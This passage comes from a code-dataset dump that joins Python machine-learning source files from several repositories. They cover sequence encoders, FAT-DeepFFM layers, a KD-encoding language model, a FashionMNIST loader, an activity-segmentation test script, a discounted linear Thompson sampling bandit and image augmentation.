self.loss += (xs[:, time_idx-1] - out)**2
return ys
def predict(self, xs, ys, out):
for time_idx in reversed(range(1, xs.shape[1])):
dec_h = self.decorder(out)
out = self.hidden_to_output(dec_h)
ys.append(out.data)
return ys
def forward(self, xs):
n_batch, n_times, dim_obs = xs.shape
for time_idx in range(n_times):
x = xs[:, time_idx]
h = self.encorder(x)
self.decorder.set_hidden_state(h)
ys = []
out = self.hidden_to_output(self.decorder.h)
ys.append(out)
self.loss = (xs[:, -1] - out)**2
if self.is_train:
self.out = self.train_step(xs, ys)
else:
self.out = self.predict(xs, ys, out)
self.loss /= n_times
self.loss = self.loss.sum()/n_batch
return self.loss
``` |
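A smoke test of the encoder-decoder with a random batch (shapes are arbitrary; `slot_size` and `memory_size` are unused by the implementation above):
```python
import torch

net = EncDec(in_size=3, h_unit_size=8, slot_size=0, memory_size=0)
net.reset_state()
xs = torch.rand(2, 5, 3)  # batch of 2 sequences, 5 steps, 3-dim observations
loss = net(xs)
loss.backward()
print(float(loss))
```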
{
"source": "0shimax/pytorch-fat-deep-ffm",
"score": 3
} |
#### File: src/feature/build.py
```python
from typing import List
import pandas
from pathlib import Path
from xfeat import SelectCategorical, ConcatCombination, LabelEncoder, Pipeline, SelectNumerical
def read_df(root_dir:str, path:str, categorical_cols:List[str], exclude_cols:List[str]=["imp_time"]):
df = pandas.read_csv(Path(root_dir, path))
df = df.astype({c:str for c in categorical_cols})
encoder = Pipeline([
SelectCategorical(exclude_cols=exclude_cols),
LabelEncoder(output_suffix=""),
])
df_encoded = pandas.concat([SelectNumerical().fit_transform(df), encoder.fit_transform(df)], axis=1)
return df_encoded
```
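A usage sketch; the CSV path and the column names are placeholders:
```python
# Hypothetical call: data/train.csv and the column names are made up.
df = read_df(
    root_dir="data",
    path="train.csv",
    categorical_cols=["site_id", "device_type"],
)
print(df.dtypes)
```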
#### File: src/model/cen_layer.py
```python
from typing import Callable
import torch
import torch.nn as nn
class ComposeExcitationNetworkLayer(nn.Module):
r"""Layer class of Compose Excitation Network (CEN) / Squeeze-and-Excitation Network (SENET).
Compose Excitation Network was used in FAT-Deep :title:`Junlin Zhang et al, 2019`[1] and
Squeeze-and-Excitation Network was used in FibiNET :title:`Tongwen Huang et al, 2019`[2]
#. compose field-aware embedded tensors by a 1D convolution with a :math:`1 * 1` kernel
feature-wisely from a :math:`k * n` tensor of field i into a :math:`k * 1` tensor.
#. concatenate the tensors and feed them to dense network to calculate attention
weights.
#. inputs' tensor are multiplied by attention weights, and return outputs tensor with
shape = (B, N * N, E).
:Reference:
    #. `Junlin Zhang et al, 2019. FAT-DeepFFM: Field Attentive Deep Field-aware Factorization Machine
<https://arxiv.org/abs/1905.06336>`_.
    #. `Tongwen Huang et al, 2019. FibiNET: Combining Feature Importance and Bilinear feature Interaction for
Click-Through Rate Prediction <https://arxiv.org/abs/1905.09433>`_.
"""
def __init__(self,
num_fields: int,
reduction: int = 1,
activation: Callable[[torch.Tensor], torch.Tensor] = nn.ReLU()):
r"""Initialize ComposeExcitationNetworkLayer
Args:
num_fields (int): Number of inputs' fields.
reduction (int, optional): Size of reduction in dense layer.
Defaults to 1.
activation (Callable[[T], T], optional): Activation function in dense layers.
Defaults to nn.ReLU().
Attributes:
pooling (torch.nn.Module): Adaptive average pooling layer to compose tensors.
fc (torch.nn.Sequential): Sequential of linear and activation to calculate weights of
attention, which the linear layers are:
:math:`[Linear(N^2, \frac{N^2}{reduction}), Linear(\frac{N^2}{reduction}, N^2)]`.
"""
# refer to parent class
super(ComposeExcitationNetworkLayer, self).__init__()
# initialize 1d pooling layer
self.pooling = nn.AdaptiveAvgPool1d(1)
# initialize dense layers
squared_num_fields = num_fields ** 2
reduced_num_fields = squared_num_fields // reduction
self.fc = nn.Sequential()
self.fc.add_module("ReductionLinear", nn.Linear(squared_num_fields, reduced_num_fields))
self.fc.add_module("ReductionActivation", activation)
self.fc.add_module("AdditionLinear", nn.Linear(reduced_num_fields, squared_num_fields))
self.fc.add_module("AdditionActivation", activation)
def forward(self, emb_inputs: torch.Tensor) -> torch.Tensor:
r"""Forward calculation of ComposeExcitationNetworkLayer
Args:
emb_inputs (T), shape = (B, N, E), dtype = torch.float: Field aware embedded features tensors.
Returns:
T, shape = (B, N, E), dtype = torch.float: Output of ComposeExcitationNetworkLayer.
"""
# Pool emb_inputs
# inputs: emb_inputs, shape = (B, N, E) <- EM_i (n_feild, embed_size)
# output: pooled_inputs, shape = (B, N, 1)
pooled_inputs = self.pooling(emb_inputs.rename(None))
pooled_inputs.names = ("B", "N", "E")
# Flatten pooled_inputs
# inputs: pooled_inputs, shape = (B, N, 1)
# output: pooled_inputs, shape = (B, N)
pooled_inputs = pooled_inputs.flatten(["N", "E"], "N")
# Calculate attention weight with dense layer forwardly
# inputs: pooled_inputs, shape = (B, N)
# output: attn_w, shape = (B, N)
attn_w = self.fc(pooled_inputs.rename(None))
attn_w.names = ("B", "N")
# Un-flatten attention weights and apply it to emb_inputs
# inputs: attn_w, shape = (B, N)
# inputs: emb_inputs, shape = (B, N, E)
# output: outputs, shape = (B, N, E)
attn_w = attn_w.unflatten("N", (("N", attn_w.size("N")), ("E", 1)))
# Multiply attentional weights on field embedding tensors
## outputs = emb_inputs * attn_w
outputs = torch.einsum("ijk,ijh->ijk", [emb_inputs.rename(None), attn_w.rename(None)])
outputs.names = ("B", "N", "E")
return outputs, attn_w
```
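A smoke test of the layer on a random field-aware embedding tensor. With `num_fields=3` the layer expects `3 * 3 = 9` composed fields, and the input must carry PyTorch named-tensor names:
```python
import torch

layer = ComposeExcitationNetworkLayer(num_fields=3, reduction=1)
emb = torch.rand(2, 9, 4, names=("B", "N", "E"))
out, attn_w = layer(emb)
print(out.rename(None).shape)  # torch.Size([2, 9, 4])
```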
#### File: src/model/dnn_layer.py
```python
from typing import Callable, List
import torch
import torch.nn as nn
class MultilayerPerceptionLayer(nn.Module):
r"""Layer class of Multilayer Perception (MLP), which is also called fully connected
layer, dense layer, deep neural network, etc, to calculate high order non linear
relations of features with a stack of linear, dropout and activation.
"""
def __init__(self,
inputs_size: int,
output_size: int,
layer_sizes: List[int],
dropout_p: List[float] = None,
activation: Callable[[torch.Tensor], torch.Tensor] = nn.ReLU()):
"""Initialize MultilayerPerceptionLayer
Args:
inputs_size (int): Input size of MLP, i.e. size of embedding tensor.
output_size (int): Output size of MLP
layer_sizes (List[int]): Layer sizes of MLP
dropout_p (List[float], optional): Probability of Dropout in MLP.
Defaults to None.
activation (Callable[[T], T], optional): Activation function in MLP.
Defaults to nn.ReLU().
Attributes:
inputs_size (int): Input size of MLP.
model (torch.nn.Sequential): Sequential of MLP.
        Raises:
            ValueError: when embed_size or num_fields is missing if using embed_size and num_field pairs,
                or when inputs_size is missing if using inputs_size.
            ValueError: when dropout_p is not None and its length is not equal to that of layer_sizes.
"""
# refer to parent class
super(MultilayerPerceptionLayer, self).__init__()
# check if length of dropout_p is not equal to length of layer_sizes
if dropout_p is not None and len(dropout_p) != len(layer_sizes):
raise ValueError("length of dropout_p must be equal to length of layer_sizes.")
# bind inputs_size to inputs_size
self.inputs_size = inputs_size
# create a list of inputs_size and layer_sizes
layer_sizes = [inputs_size] + layer_sizes
layers = []
# initialize module of linear, activation and dropout, and add them to sequential module
for i, (in_f, out_f) in enumerate(zip(layer_sizes[:-1], layer_sizes[1:])):
layers.append(nn.Linear(in_f, out_f))
if activation is not None:
layers.append(activation)
if dropout_p is not None:
layers.append(nn.Dropout(dropout_p[i]))
# initialize module of linear and add it to sequential module
layers.append(nn.Linear(layer_sizes[-1], output_size))
# initialize sequential of model
self.model = nn.Sequential(*layers)
def forward(self, emb_inputs: torch.Tensor) -> torch.Tensor:
r"""Forward calculation of MultilayerPerceptionLayer
Args:
emb_inputs (T), shape = (B, N, E), dtype = torch.float: Embedded features tensors.
Returns:
T, shape = (B, N, O), dtype = torch.float: Output of MLP.
"""
# Calculate with model forwardly
# inputs: emb_inputs, shape = (B, N, E)
# output: outputs, shape = (B, N, O)
outputs = self.model(emb_inputs.rename(None))
# Rename tensor names
if outputs.dim() == 2:
outputs.names = ("B", "O")
elif outputs.dim() == 3:
outputs.names = ("B", "N", "O")
return outputs
```
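A smoke test with named tensors, projecting 8-dim embeddings of 5 fields through two hidden layers down to 4 dims:
```python
import torch

mlp = MultilayerPerceptionLayer(inputs_size=8, output_size=4,
                                layer_sizes=[16, 16], dropout_p=[0.1, 0.1])
emb = torch.rand(2, 5, 8, names=("B", "N", "E"))
out = mlp(emb)
print(out.rename(None).shape)  # torch.Size([2, 5, 4])
```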
#### File: src/model/embed_layer.py
```python
from typing import List
import torch
import torch.nn as nn
import numpy
class EmbedingLayer(nn.Module):
def __init__(self,
num_numerical_fields: int,
num_categorical_fields: int,
num_ids: List[int],
embed_size: int,
device: str="cpu"):
super(EmbedingLayer, self).__init__()
        # NULL ids are mapped to 0; that is why an additional embedding row is added
if num_numerical_fields>0:
self.conv = nn.Conv1d(1, embed_size*2, 1)
self.num_numerical_fields = num_numerical_fields
self.num_categorical_fields = num_categorical_fields
self.embed_size = embed_size
# bind num_field to the length of field_sizes
self.num_fields = len(num_ids)
# create ModuleList of nn.Embedding for each field of inputs
        # NULL ids are mapped to 0; that is why an additional embedding row is added
self.embeddings = nn.ModuleList([
nn.Embedding(sum(num_ids)+1, embed_size) for _ in range(self.num_fields)
])
# create offsets to re-index inputs by adding them up
## self.offsets = torch.Tensor((0, *np.cumsum(num_ids)[:-1])).long().unsqueeze(0)
self.offsets = torch.Tensor((0, *numpy.cumsum(num_ids)[:-1])).long()
self.offsets.names = ("N",)
self.offsets = self.offsets.unflatten("N", [("B", 1), ("N", self.offsets.size("N"))])
        self.offsets = self.offsets.to(device)  # .to() is not in-place, so reassign
# initialize nn.Embedding with xavier_uniform_ initializer
for embedding in self.embeddings:
nn.init.xavier_uniform_(embedding.weight.data)
def forward(self,
X_categorical: List[torch.Tensor],
X_numerical: torch.Tensor = None
) -> torch.Tensor:
X_categorical = X_categorical + self.offsets
X_categorical = X_categorical.rename(None)
if X_numerical is None:
outputs = torch.cat([self.embeddings[i](X_categorical) for i in range(self.num_fields)], dim=1)
outputs.names = ("B", "N", "E")
return outputs
numerical_emb = self.conv(X_numerical).reshape(-1, self.num_numerical_fields*2, self.embed_size)
cat_emb = torch.cat([self.embeddings[i](X_categorical) for i in range(self.num_fields)], dim=1)
outputs = torch.cat([numerical_emb, cat_emb], dim=1)
outputs.names = ("B", "N", "E")
return outputs
``` |
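A smoke test for the purely categorical path (no numerical features). Two fields with vocabulary sizes 3 and 5 produce one embedding block per field, concatenated along the field axis:
```python
import torch

layer = EmbedingLayer(num_numerical_fields=0, num_categorical_fields=2,
                      num_ids=[3, 5], embed_size=4)
x_cat = torch.stack([torch.randint(0, 3, (2,)),
                     torch.randint(0, 5, (2,))], dim=1)  # shape (batch=2, fields=2)
out = layer(x_cat)
print(out.rename(None).shape)  # torch.Size([2, 4, 4])
```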
{
"source": "0shimax/Pytorch-KDEncoding",
"score": 3
} |
#### File: Pytorch-KDEncoding/src/train.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from models.kdencoding import SimpleKDEncoding
class NGramLanguageModeler(nn.Module):
def __init__(self, vocab_size, embedding_dim, context_size):
super().__init__()
self.kd_enc = SimpleKDEncoding(
vocab_size, k_concept=2, k_character=2, D=4)
self.embeddings = nn.Linear(4, embedding_dim)
# self.embeddings = nn.Embedding(vocab_size, embedding_dim)
self.linear1 = nn.Linear(context_size * embedding_dim, 128)
self.linear2 = nn.Linear(128, vocab_size)
def forward(self, inputs):
kd = self.kd_enc(inputs)
        kd = kd.float()  # cast the discrete KD codes to float for the linear embedding
embeds = self.embeddings(kd).view((1, -1))
# embeds = self.embeddings(inputs).view((1, -1))
out = F.relu(self.linear1(embeds))
out = self.linear2(out)
log_probs = F.log_softmax(out, dim=1)
return log_probs
CONTEXT_SIZE = 2
EMBEDDING_DIM = 10
# We will use Shakespeare Sonnet 2
test_sentence = """When forty winters shall besiege thy brow,
And dig deep trenches in thy beauty's field,
Thy youth's proud livery so gazed on now,
Will be a totter'd weed of small worth held:
Then being asked, where all thy beauty lies,
Where all the treasure of thy lusty days;
To say, within thine own deep sunken eyes,
Were an all-eating shame, and thriftless praise.
How much more praise deserv'd thy beauty's use,
If thou couldst answer 'This fair child of mine
Shall sum my count, and make my old excuse,'
Proving his beauty by succession thine!
This were to be new made when thou art old,
And see thy blood warm when thou feel'st it cold.""".split()
# we should tokenize the input, but we will ignore that for now
# build a list of tuples. Each tuple is ([ word_i-2, word_i-1 ], target word)
trigrams = [([test_sentence[i], test_sentence[i + 1]], test_sentence[i + 2])
for i in range(len(test_sentence) - 2)]
# print the first 3, just so you can see what they look like
print(trigrams[:3])
vocab = set(test_sentence)
word_to_ix = {word: i for i, word in enumerate(vocab)}
print("voc size:", len(vocab))
losses = []
loss_function = nn.NLLLoss()
model = NGramLanguageModeler(len(vocab), EMBEDDING_DIM, CONTEXT_SIZE)
optimizer = optim.SGD(model.parameters(), lr=0.001)
for epoch in range(300):
total_loss = 0
for context, target in trigrams:
# Step 1. Prepare the inputs to be passed to the model (i.e, turn the words
# into integer indices and wrap them in tensors)
context_idxs = torch.LongTensor([[word_to_ix[w] for w in context]])
# Step 2. Recall that torch *accumulates* gradients. Before passing in a
# new instance, you need to zero out the gradients from the old
# instance
model.zero_grad()
# Step 3. Run the forward pass, getting log probabilities over next
# words
log_probs = model(context_idxs)
# Step 4. Compute your loss function. (Again, Torch wants the target
# word wrapped in a tensor)
loss = loss_function(log_probs, torch.LongTensor([word_to_ix[target]]))
# Step 5. Do the backward pass and update the gradient
loss.backward()
optimizer.step()
# Get the Python number from a 1-element Tensor by calling tensor.item()
total_loss += loss.item()
losses.append(total_loss)
print(losses) # The loss decreased every iteration over the training data!
context_idxs = torch.LongTensor([[word_to_ix[w] for w in ['made', 'make']]])
log_probs = model.kd_enc(context_idxs, debug=True)
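# Probing two related words ('made'/'make'); with debug=True the encoder is expected
# to expose their discrete KD codes so similar words can be compared (an assumption
# based on the flag name -- SimpleKDEncoding's debug behaviour lives in its own module).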
``` |
{
"source": "0shimax/pytorch-sam-lr",
"score": 3
} |
#### File: src/model/lr.py
```python
import torch
import torch.nn as nn
import torch.nn.functional as F
class LrNet(nn.Module):
def __init__(self, in_dim, n_class=2):
super(LrNet, self).__init__()
self.fc1 = nn.Linear(in_dim, 256)
self.fc2 = nn.Linear(256, 256)
self.fc3 = nn.Linear(256, n_class)
def forward(self, x):
h = F.relu(self.fc1(x))
h = F.dropout(h)
h = F.relu(self.fc2(h))
h = F.dropout(h)
out = self.fc3(h)
return out.squeeze(1)
``` |
{
"source": "0shimax/PyTorch-SoftTriple",
"score": 3
} |
#### File: src/feature/data_loader_for_NFCM.py
```python
import torchvision
import torch
from torch.utils.data import Dataset
import numpy as np
import random
# label  class
# 0  T-shirt/top
# 1  Trouser
# 2  Pullover
# 3  Dress
# 4  Coat
# 5  Sandal
# 6  Shirt
# 7  Sneaker
# 8  Bag
# 9  Ankle boot
near_cat_dict = {0:[0,1,5,6,7,9], 1:[0,1,2,5,6,7,9], 2:[1,2,5,7], 3:[3,4,8],
4:[1,4,6,8,9], 5:[0,1,5,6], 6:[1,5,6,7,9], 7:[0,1,6,7],
8:[3,4,8,9], 9:[1,4,6,8,9]}
# far_cat = {0:[], 1:[], 2:[], 3:[], 4:[], 5:[], 6:[], 7:[], 8:[], 9:[]}
class FMNISTDataset(Dataset):
def __init__(self, n_class=10, train=True):
super().__init__()
self.n_class = n_class
self.train = train
self.n_relation = self.n_class**2
self.fashion_mnist_data = torchvision.datasets.FashionMNIST(
'./fashion-mnist',
transform=torchvision.transforms.ToTensor(),
train=train,
download=True)
        self.labels = [fnmn[1] for fnmn in torchvision.datasets.FashionMNIST('./fashion-mnist', train=train)]  # match the split selected above
self.labels = np.array(self.labels, dtype=np.int32)
def __len__(self):
return len(self.fashion_mnist_data)
def __getitem__(self, idx):
image, cat = self.fashion_mnist_data[idx]
return image, cat
def loader(dataset, batch_size, shuffle=True):
loader = torch.utils.data.DataLoader(
dataset,
batch_size=batch_size,
shuffle=shuffle,
num_workers=0)
return loader
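# Minimal usage sketch (illustrative):
# dataset = FMNISTDataset(train=True)
# train_loader = loader(dataset, batch_size=128)
# images, labels = next(iter(train_loader))  # images: (128, 1, 28, 28)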
``` |
{
"source": "0shimax/SE-Wavenet",
"score": 3
} |
#### File: src/features/diff_dim_seq.py
```python
import numpy as np
import itertools
def add_diff_features(features):
seq_len, n_dim = features.shape
comb = list(itertools.combinations(range(n_dim), 2))
add_mat = np.empty([seq_len, len(comb)], dtype=np.float32)
for i_add, cmb in enumerate(comb):
add_mat[:, i_add] = features[:, cmb[0]] - features[:, cmb[1]]
return np.concatenate((features, add_mat), axis=1)
```
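A quick usage sketch for `add_diff_features` (the function is defined in the file above; making it importable is assumed):
```python
import numpy as np

features = np.arange(6, dtype=np.float32).reshape(2, 3)   # (seq_len=2, n_dim=3)
out = add_diff_features(features)
print(out.shape)  # (2, 6): 3 original dims + C(3, 2) = 3 pairwise-difference dims
```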
#### File: SE-Wavenet/src/test.py
```python
import argparse
from pathlib import Path
import torch
import torch.nn.functional as F
from sklearn.metrics import precision_recall_fscore_support, roc_curve, auc
import matplotlib.pyplot as plt
import numpy as np
from data.data_loader import ActivDataset, loader
from models.focal_loss import FocalLoss
from models.ete_waveform import EteWave
from models.post_process import as_seaquence
torch.manual_seed(555)
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
print("device:", device)
def main(args):
model = EteWave(args.n_class).to(device)
if Path(args.resume_model).exists():
print("load model:", args.resume_model)
model.load_state_dict(torch.load(args.resume_model))
test_data_file_names =\
[line.rstrip() for line in open(args.test_data_file_pointer_path)]
test_dataset = ActivDataset(test_data_file_names, args.root_dir,
seq_len=args.test_seq_len, time_step=args.time_step,
is_train=False)
test_loader = loader(test_dataset, 1, shuffle=False)
test(args, model, test_loader)
def test(args, model, data_loader):
model.eval()
test_loss = 0
segmentation_correct = 0
lack_classifier_correct = 0
total_len = 0
lack_total_len = 0
true_seq_labels = []
inf_seq_labels = []
true_finish_labels = []
inf_finish_labels = []
inf_finish_proba = []
true_finish_labels_mat = np.empty([len(data_loader), 5])
inf_finish_labels_mat = np.empty([len(data_loader), 5])
with torch.no_grad():
for i_batch, (l_data, l_target, l_lack_labels) in enumerate(data_loader):
l_data = l_data.to(device)
l_target = l_target.to(device)
l_lack_labels = l_lack_labels.to(device)
total_len += l_target.shape[-1]
lack_total_len += l_lack_labels.shape[-1]
output = model(l_data)
output = output.view([-1, output.shape[-1]])
targets = l_target.view(-1)
test_loss += F.cross_entropy(output, targets, ignore_index=-1).item()
pred = output.argmax(1)
pred = as_seaquence(pred.detach(), ahead=7)
segmentation_correct += pred.eq(targets.view_as(pred)).sum().item()
model.tatc.select_data_per_labels(l_data, pred, device)
tatc_output = model.tatc()
test_loss += F.cross_entropy(tatc_output, l_lack_labels.reshape(-1)).item()
tatc_pred = tatc_output.argmax(1)
print("true:", l_lack_labels[0])
print("inference:", tatc_pred)
lack_classifier_correct += tatc_pred.eq(l_lack_labels.view_as(tatc_pred)).sum().item()
true_seq_labels += targets.view_as(pred).cpu().tolist()
inf_seq_labels += pred.cpu().tolist()
lack_labels_cpu = l_lack_labels.view_as(tatc_pred).cpu().tolist()
tatc_pred_cpu = tatc_pred.cpu().tolist()
true_finish_labels += lack_labels_cpu
inf_finish_labels += tatc_pred_cpu
inf_finish_proba += tatc_output[:, 1].view(-1).cpu().tolist()
true_finish_labels_mat[i_batch] = lack_labels_cpu
inf_finish_labels_mat[i_batch] = tatc_pred_cpu
test_loss /= len(data_loader.dataset)
print('\nTest set: Average loss: {:.4f}, Seg Accuracy: {}/{} ({:.0f}%), lack Accuracy: {}/{} ({:.0f}%)\n'
.format(test_loss,
segmentation_correct, total_len, 100. * segmentation_correct / total_len,
lack_classifier_correct, lack_total_len, 100. * lack_classifier_correct / lack_total_len))
print("seq f1:")
print(precision_recall_fscore_support(true_seq_labels, inf_seq_labels))
print("finish work:")
print(precision_recall_fscore_support(true_finish_labels, inf_finish_labels))
fpr, tpr, _ = roc_curve(true_finish_labels, inf_finish_proba)
plt.plot(fpr, tpr)
plt.savefig( Path(args.out_dir, 'finish_roc.png') )
print("finish work AUC:")
print(auc(fpr, tpr))
    for i in range(args.n_class - 1):
print("class {}:".format(i))
print(precision_recall_fscore_support(true_finish_labels_mat[:, i], inf_finish_labels_mat[:, i]))
print("低速:")
print(precision_recall_fscore_support(true_finish_labels_mat[:5, :].ravel(), inf_finish_labels_mat[:5, :].ravel()))
print("中速:")
print(precision_recall_fscore_support(true_finish_labels_mat[5:10, :].ravel(), inf_finish_labels_mat[5:10, :].ravel()))
print("高速:")
print(precision_recall_fscore_support(true_finish_labels_mat[10:15, :].ravel(), inf_finish_labels_mat[10:15, :].ravel()))
for i in range(5):
start = 15+i*3
end = 15+(i+1)*3
print("作業{}中断再開:".format(i+1))
print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel()))
for i in range(5):
start = 30+i*3
end = 30+(i+1)*3
print("作業{}中断:".format(i+1))
print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel()))
for i in range(5):
start = 45+i*3
end = 45+(i+1)*3
print("作業{}欠損:".format(i+1))
print(precision_recall_fscore_support(true_finish_labels_mat[start:end, :].ravel(), inf_finish_labels_mat[start:end, :].ravel()))
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('--root_dir', default='/home/sh70k/mnt/tracker_data/test', help='path to dataset')
    parser.add_argument('--n-class', type=int, default=6, help='number of classes')
    parser.add_argument('--test-seq-len', type=int, default=200, help='fixed sequence length')
    parser.add_argument('--time-step', type=float, default=.25, help='fixed time interval of input data')
parser.add_argument('--test-data-file-pointer-path', default='./data/test_data_file_pointer', help='path to test data file pointer')
parser.add_argument('--resume-model', default='/home/sh70k/mnt/tracker_data/results/model_ckpt_v1_average.pth', help='path to trained model')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=4)
parser.add_argument('--batch-size', type=int, default=1, help='input batch size')
parser.add_argument('--out-dir', default='/home/sh70k/mnt/tracker_data/results', help='folder to output data and model checkpoints')
args = parser.parse_args()
    Path(args.out_dir).mkdir(parents=True, exist_ok=True)
main(args)
``` |
{
"source": "0shimax/SW-TS",
"score": 3
} |
#### File: SW-TS/src/DLinTS.py
```python
import numpy as np
from math import log
from numpy.linalg import pinv
# from numpy import linalg as LA
# from scipy.stats import truncnorm
import scipy.linalg  # plain "import scipy" does not expose scipy.linalg.sqrtm used below
from dataclasses import dataclass
# from arm import ArmGaussian
@dataclass
class DLinTS(object):
"""
Implementation of the class for the Discounted Follow-The-Gaussian-Perturbed-Leader
param:
- d: dimension of the action vectors (feature dimension)
- delta: probability of theta in the confidence bound
- alpha: tuning the exploration parameter
- lambda_: regularization parameter
- s: constant such that L2 norm of theta smaller than s
- gamma: discount parameter
- name: additional suffix when comparing several policies (optional)
    - sm: should the Sherman-Morrison formula be used for inverting matrices?
    - sigma_noise: square root of the variance of the noise
    - verbose: whether to print information
    - omniscient: does the policy know when the breakpoints happen?
    ACTION NORMS ARE ASSUMED TO BE BOUNDED BY 1
"""
dim: int
delta: float
alpha: float
lambda_: float
# s: float
# l: float
gamma: float
sigma_noise: float
verbose: bool # = True
# S-M cannot be used with this model for the moment
sm: bool # = False
# omniscient: bool # = False
t: int = None
gamma2_t: float = None
def __post_init__(self):
''' build attributes '''
# first term in square root
self.c_delta = 2 * log(1 / self.delta)
''' attributes for the re-init '''
# model parameter
self.hat_theta = np.zeros(self.dim)
# Design Matrix
self.cov = self.lambda_ * np.identity(self.dim)
# Design Square Matrix
self.cov_squared = self.lambda_ * np.identity(self.dim)
self.invcov = 1 / self.lambda_ * np.identity(self.dim)
self.b = np.zeros(self.dim)
self.t = 0
self.gamma2_t = 1.0
    def update_state(self, features: np.ndarray, reward: float):
"""
Updating the main parameters for the model
param:
- features: Feature used for updating
- reward: Reward used for updating
Output:
-------
Nothing, but the class instances are updated
"""
assert isinstance(features, np.ndarray), 'np.array required'
aat = np.outer(features, features.T)
self.gamma2_t *= self.gamma ** 2
self.cov = self.gamma * self.cov + aat + (1-self.gamma) * self.lambda_ * np.identity(self.dim)
self.cov_squared = self.gamma ** 2 * self.cov_squared + aat + (1 - self.gamma ** 2) * self.lambda_ * np.identity(self.dim)
self.b = self.gamma * self.b + reward * features
# const1 = np.sqrt(self.lambda_) * self.s
# beta_t = const1 + self.sigma_noise *\
# np.sqrt(self.c_delta + self.dim * np.log(1 + self.l**2 *(1-self.gamma2_t)/(self.dim * self.lambda_*(1 - self.gamma**2))))
if not self.sm:
self.invcov = pinv(self.cov)
else:
raise NotImplementedError("Method SM is not implemented for D-LinTS")
z = np.random.multivariate_normal(np.zeros(self.dim), np.eye(self.dim))
self.hat_theta = np.inner(self.invcov, self.b + self.alpha * np.dot(scipy.linalg.sqrtm(self.cov_squared).real, z))
if self.verbose:
print('AAt:', aat)
print('Policy was updated at time t= ' + str(self.t))
print('Reward received =', reward)
self.t += 1
def calculate_win_rate(self, features:np.ndarray):
assert isinstance(features, np.ndarray), 'np.array required'
return features.dot(self.hat_theta)[0][0]
def __str__(self):
return 'D-LinTS'
@staticmethod
def id():
return 'D-LinTS'
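# --- Minimal usage sketch; not part of the original module, parameter values are illustrative ---
if __name__ == "__main__":
    policy = DLinTS(dim=3, delta=0.05, alpha=1.0, lambda_=1.0,
                    gamma=0.99, sigma_noise=0.1, verbose=False, sm=False)
    for _ in range(10):
        features = np.random.rand(3)    # context/action vector (norm roughly bounded)
        reward = float(features.sum())  # toy reward signal
        policy.update_state(features, reward)
    print(policy.hat_theta)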
``` |
{
"source": "0shimax/tensorflow-layers-examples",
"score": 3
} |
#### File: scripts/data_loader/augmentation.py
```python
import tensorflow as tf
from tensorflow.python.framework import ops
from tensorflow.python.framework import dtypes
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import check_ops  # used by _Check3DImage below
import numpy as np  # used by apply_projection_transform below
import random
from random import randint
rand_seed = 555
random.seed(555)
scaling_factor = [0.5, 0.625, 0.75, 0.875, 1, 1.125, 1.25, 1.375, 1.5]
shift_factor = [0, 16, 32, 48, 64]
def augment(image, multiple):
xh, xw, xch = image.get_shape().as_list()
# Randomly flip the image horizontally.
image = tf.image.random_flip_left_right(image, seed=rand_seed)
image = tf.image.random_flip_up_down(image, seed=rand_seed)
image = tf.image.random_contrast(image, lower=0.2, upper=1.8, seed=rand_seed)
image = tf.image.random_brightness(image, max_delta=63, seed=rand_seed)
# k = randint(0, 3)
# # rot90 has bug. now skip rot.
# # rot90 is not affine transformation.
# image = rot90(image, k=k)
# # offset image
# image = shift(image, h, w)
# image = scaling(image, multiple, h, w, ch)
# h, w, ch = image.get_shape().as_list()
# print(h, w, ch)
return image
def scaling(image, multiple, h, w, ch):
# h, w, ch = image.get_shape().as_list()
    scale = scaling_factor[randint(0, len(scaling_factor)-1)]  # pick a factor, not its index
new_sz = [int(h*scale)+1, int(w*scale)+1]
# scaling
image = tf.image.resize_images(image, new_sz)
xh, xw, ch = image.get_shape().as_list()
m0, m1 = xh % multiple, xw % multiple
d0, d1 = randint(0, m0), randint(0, m1)
image = tf.random_crop(image, [xh-m0, xw-m1, ch], seed=rand_seed)
return image
def shift(image, h, w):
x_shift_idx = randint(0, len(shift_factor)-1)
y_shift_idx = randint(0, len(shift_factor)-1)
x_shift = shift_factor[x_shift_idx]
y_shift = shift_factor[y_shift_idx]
print(x_shift, y_shift, h, w)
image = tf.image.pad_to_bounding_box(image, x_shift, y_shift, h-x_shift, w-y_shift)
return image
def rot90(image, k=1, name=None):
"""Rotate an image counter-clockwise by 90 degrees.
Args:
image: A 3-D tensor of shape `[height, width, channels]`.
k: A scalar integer. The number of times the image is rotated by 90 degrees.
name: A name for this operation (optional).
Returns:
A rotated 3-D tensor of the same type and shape as `image`.
"""
with ops.name_scope(name, 'rot90', [image, k]) as scope:
image = ops.convert_to_tensor(image, name='image')
_Check3DImage(image, require_static=False)
k = ops.convert_to_tensor(k, dtype=dtypes.int32, name='k')
k.get_shape().assert_has_rank(0)
k = math_ops.mod(k, 4)
def _rot90():
return array_ops.transpose(array_ops.reverse_v2(image, [1]),
[1, 0, 2])
def _rot180():
return array_ops.reverse_v2(image, [0, 1])
def _rot270():
return array_ops.reverse_v2(array_ops.transpose(image, [1, 0, 2]),
[1])
cases = [(math_ops.equal(k, 1), _rot90),
(math_ops.equal(k, 2), _rot180),
(math_ops.equal(k, 3), _rot270)]
ret = control_flow_ops.case(cases, default=lambda: image, exclusive=True,
name=scope)
h, w, ch = image.get_shape().as_list()
if k==1 or k==3:
shape = [w, h]
else:
shape = [h, w]
ret.set_shape(shape+[ch])
return ret
def _Check3DImage(image, require_static=True):
"""Assert that we are working with properly shaped image.
Args:
image: 3-D Tensor of shape [height, width, channels]
require_static: If `True`, requires that all dimensions of `image` are
known and non-zero.
Raises:
ValueError: if `image.shape` is not a 3-vector.
Returns:
An empty list, if `image` has fully defined dimensions. Otherwise, a list
containing an assert op is returned.
"""
try:
image_shape = image.get_shape().with_rank(3)
except ValueError:
raise ValueError("'image' (shape %s) must be three-dimensional." %
image.shape)
if require_static and not image_shape.is_fully_defined():
raise ValueError("'image' (shape %s) must be fully defined." %
image_shape)
if any(x == 0 for x in image_shape):
raise ValueError("all dims of 'image.shape' must be > 0: %s" %
image_shape)
if not image_shape.is_fully_defined():
return [check_ops.assert_positive(array_ops.shape(image),
["all dims of 'image.shape' "
